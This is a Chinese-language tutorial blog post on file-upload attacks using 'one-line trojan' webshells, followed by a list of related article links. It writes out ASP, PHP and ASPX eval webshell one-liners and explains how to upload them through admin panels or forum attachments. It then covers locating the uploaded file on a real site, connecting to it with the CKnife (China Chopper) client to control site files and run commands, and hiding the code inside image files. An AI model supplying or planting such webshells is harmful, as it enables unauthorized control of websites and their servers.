声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写!

上传漏洞-一句话木马

讲述内容:

  • 一句话木马 木马使用技巧
  • (中国菜刀、C32、CKnife)

简介:

  • 一句话木马

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用
往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录并可执行一些web账号所有权限的系统命令,进入后渗透阶段。但是发现百度上找到的菜刀都有后门,而且找了很久都没有找到可以用的菜刀,所以推荐两款更好的kali下的工具:webacoo、Weevely 和windows下的工具:CKnife java版本的中国菜刀。


接下来我将演示CKnife java版本的中国菜刀的使用方法,并进行讲解

本程序需要设置 JAVA运行环境

jdk32位 下载 http://www.uzzf.com/soft/395.html

jdk64位 下载 http://www.uzzf.com/soft/77216.html

CKnife java版本菜刀 下载 http://pan.baidu.com/s/1boyQTXH


使用

1.下载菜刀,打开Cknife.jar软件,选择用java打开

2.在上传一句话漏洞时,我们有两个方法

<1.已经有了网站后台的登录密码以及账号,登录网站后台后上传一句话木马文件>

<2.在一些网站如论坛等等用户可以上传附件>//这种方法成功率不高,很多网站对附件有限制

在这里我用虚拟机搭一个靶机,模拟网站服务器.

靶机IP地址为:192.168.138.131

3.模拟上传木马文件步骤到服务器

写法——

Asp一句话:<%eval request(“xxx”)%>

Php 一句话:<%php @eval($_POST[xxx]);?>

Aspx一句话:<%@ Page Languag=”xxx”%><%eval(Request.Item[“xxx”])%>

(然后保存为相应的文件格式并上传)//xxx是连接的密码,必须记住,重命名时不能有中文

4.找到我们上传木马的地址


如果是在真正的实战中我们怎么得到木马的地址呢??

我们可以在前端找到我们上传的附件,然后右击审查属性,就可以看到附件的地址。也可以在网站后台找到附件存储的位置


5.打开Cknife.jar软件

右键点击添加,输入上传的php文件地址,php文件密码,脚本类型选择PHP,字符编码GB2312,点击添加

6.右键文件管理就可以了

除了文件上传还有图片上传,把一句话漏洞加载到图片里面,通过文件上传的方式上传一句话木马//图片连接性不高,需要iis的解析漏洞,这个漏洞是很久以前的了,所以连接性不高

工具:C32反翻译软件

步骤:打开C32反翻译软件→将图片拖入软件里面(16进制模式)→在右面代码最下端写入一句话代码→另存为(后缀改为图片原本的后缀)

写代码是热爱,写到世界充满爱!

上传漏洞-一句话木马相关推荐

  1. 文件上传漏洞(一句话木马)-学习笔记

    什么是webshell? 渗webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门 ...

  2. 文件上传漏洞—一句话图片马制作

    文件上传漏洞-一句话图片马制作 提要:在文件上传漏洞中,通常需要上传脚本类型的文件至服务端执行,获取WebShell,但是网站会严格过滤脚本类型的文件,这个时候便可以通过图片马来尝试突破. 简介:在图 ...

  3. 文件上传漏洞——DVWA练习

    前言:文件上传漏洞是很常见的漏洞,也非常有趣,接下来就在DVWA靶场中边学边练. 文件上传漏洞: 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向 ...

  4. 上传漏洞学习——upload-labs 闯关(二)

    文章目录 前言: Less-11(get型 %00截断) Less-12(post型 00截断) Less-13(图片马绕过) Less-14(getimagesize检测) Less-15(exif ...

  5. 文件上传漏洞测试upload-labs

    文件上传是web十大安全漏洞之一,它是我们在信息安全渗透测试中最常见的漏洞类型 他主要是一些网站上传用的的头像文件的时候没有进行过滤,利用PHP本身的远程木马执行,利用中国菜刀,蚁剑之类的工具进行连接 ...

  6. DVWA靶机-文件上传漏洞(File Upload)

    DVWA靶机-文件上传漏洞(File Upload) 文件上传漏洞的四个等级,low,medium,high,impossible,今天我们针对于不同的等级进行基于文件上传漏洞的攻击 DVWA靶机-暴 ...

  7. File Upload(文件上传漏洞)

    File Upload: 文件上传漏洞 通常是由于对上传文件的类型.内容没有进行严格的过滤.检查,使得攻击者可以通过上传木马获取服务器的webshell权限 Low: 源代码; <?phpif( ...

  8. 文件上传漏洞的小总结

    目录 一.原理 二. 高危触发点 三.前端处理 四. 后端处理 五. 上传分类 1. js验证 绕过方法 2. 文件扩展名检测 (1). htaccsee上传漏洞 (2). Apache1.x,2.x ...

  9. 利用put、move的请求方式对IIS6.0服务器上传执行asp木马

    利用put.move的请求方式上传执行木马 实验环境:windows-server2003服务器(安装IIs6.0服务器)windows2007 关闭防火墙 使用工具:iiswrite 中国菜刀软件 ...

  10. web安全-上传漏洞-fck编辑器利用

    本节工具: FCK编辑器漏洞综合利用工具 Burpsuite抓包工具BurpSuite破解版及安装教程 FCK编辑器(FCKEditor 富文本编辑器) FCKeditor简介 FCKeditor是一 ...

最新文章

  1. python opencv 界面按钮_PyAutoGUI:自动化键鼠操作的Python类库
  2. python 内存数据库下载,Python 文件存储和数据库
  3. CF1338D:Nested Rubber Bands(树形dp)
  4. TCP/IP笔记-ARP协议包结构相关笔记
  5. 搜狗浏览器下 禁止浏览器自动填写用户名、密码
  6. WordPress主题LensNews1.8模板源码,WP多功能新闻积分商城主题
  7. ArrayQueue详解(待解决)
  8. HDU4619--Warm up 2
  9. 解决Caused by: java.io.IOException: java.io.IOException: error=12, Cannot allocate memory
  10. 使用DataStudio连接本地虚拟机中的opengauss数据库
  11. java8编程入门 pdf_Java8编程入门官方教程(第6版).pdf
  12. USBCAN接口卡打开失败收不到数据常见问题分析
  13. 阿里 Java 性能调优手册,简直yyds
  14. JupyterNotebook中更新pip以及使用pip install安装lightgbm
  15. java excel 水印_Java 添加Excel水印
  16. Paper:《Pre-Trained Models: Past, Present and Future大规模预训练模型的发展历史、最新现状和未来发展三个方向》翻译与解读
  17. 追寻本质还是流于形式
  18. 最专业逻辑图和最专业项目文档制作实战讲解
  19. 帆软报表多数据集关联合并操作
  20. [SIGMOD 2021] SharPer: Sharding Permissioned Blockchains Over Network Clusters

热门文章

  1. vue zxing 实现一维码、二维码扫描可移动端h5使用代码亲测可用
  2. android代码设置digits,andorid editext android:digits=abcdefghijklmnopqrstuvwxyz用代码写来控制规则该怎么写呢?...
  3. 【微信小程序使用阿里巴巴矢量图标库】
  4. tomcat加载出现找不到web
  5. 粒子群优化算法matlab实现,粒子群优化算法的MATLAB程序实现+源程序
  6. 一张图慢慢转换成下一张图_如何把一张照片变成炫酷的动图?
  7. matlab中 dataset用法,dataset中shuffle()、repeat()、batch()用法
  8. 内网主机通过外网地址访问内网服务器
  9. Go语言实战抽奖系统
  10. 谷歌翻译退出中国,官方因其使用率过低